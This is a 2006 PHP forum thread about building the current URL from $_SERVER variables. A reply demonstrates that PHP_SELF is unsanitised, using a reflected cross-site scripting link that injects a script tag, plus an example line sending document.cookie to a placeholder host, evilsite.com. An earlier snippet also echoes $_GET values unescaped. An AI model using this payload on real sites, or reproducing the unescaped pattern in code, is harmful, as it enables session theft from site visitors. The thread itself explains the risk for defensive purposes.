@PineSolPirateJul 21.2006 — #$_SERVER['PHP_SELF'] gets you everything but the domain (usually).
EDIT
To add on any get variables, just do something like: [code=php]$url = $_SERVER['PHP_SELF']; foreach($_GET as $key=>$value) { $url .= "&".$key."=".$value; }[/code]
@NogDogJul 21.2006 — #$_SERVER['REQUEST_URI'] gives you everything based from the document root. If you need the protocol://server portion, you'll need to prepend that manually:
@NogDogJul 21.2006 — #Use [I]$_SERVER['PHP_SELF'][/I] with caution. It is not a sanitized variable.[/QUOTE] You've mentioned this a couple times, but I don't recall an explanation as to why. Could you expand on this or refer us to a link?
@PineSolPirateJul 21.2006 — #Yes, please. I don't understand how it can't be clean if its the script name and path from the domain on. I don't even think you can change $_SERVER superglobals can you?
@bokehJul 22.2006 — #You've mentioned this a couple times, but I don't recall an explanation as to why. Could you expand on this or refer us to a link?[/QUOTE]Well it all depends on the server but most servers are wide open to this and magic_quotes_GPC doesn't stop it.
Now post a link to that form from a third party site such as this one: [URL=http://bokehman.com/tests/php-self-form.php//%22%3E%3Cscript%3Ealert('I%20just%20stole%20your%20cookies:%20'+document.cookie)%3C/script%3E%3Ctidy+up%3D%22-]visit my form[/URL]. Follow the link.
You could run pretty much any piece of javascript you liked on the client and the client would believe it came from the source site and so would be happy to give up any information that belonged to the source domain. For example: [code=php]window.location('http://evilsite.com/?stolen_cookies=' + document.cookie)[/code]
By the way I looked at your site (email me) and this is the first server I have seen that is escaping this.
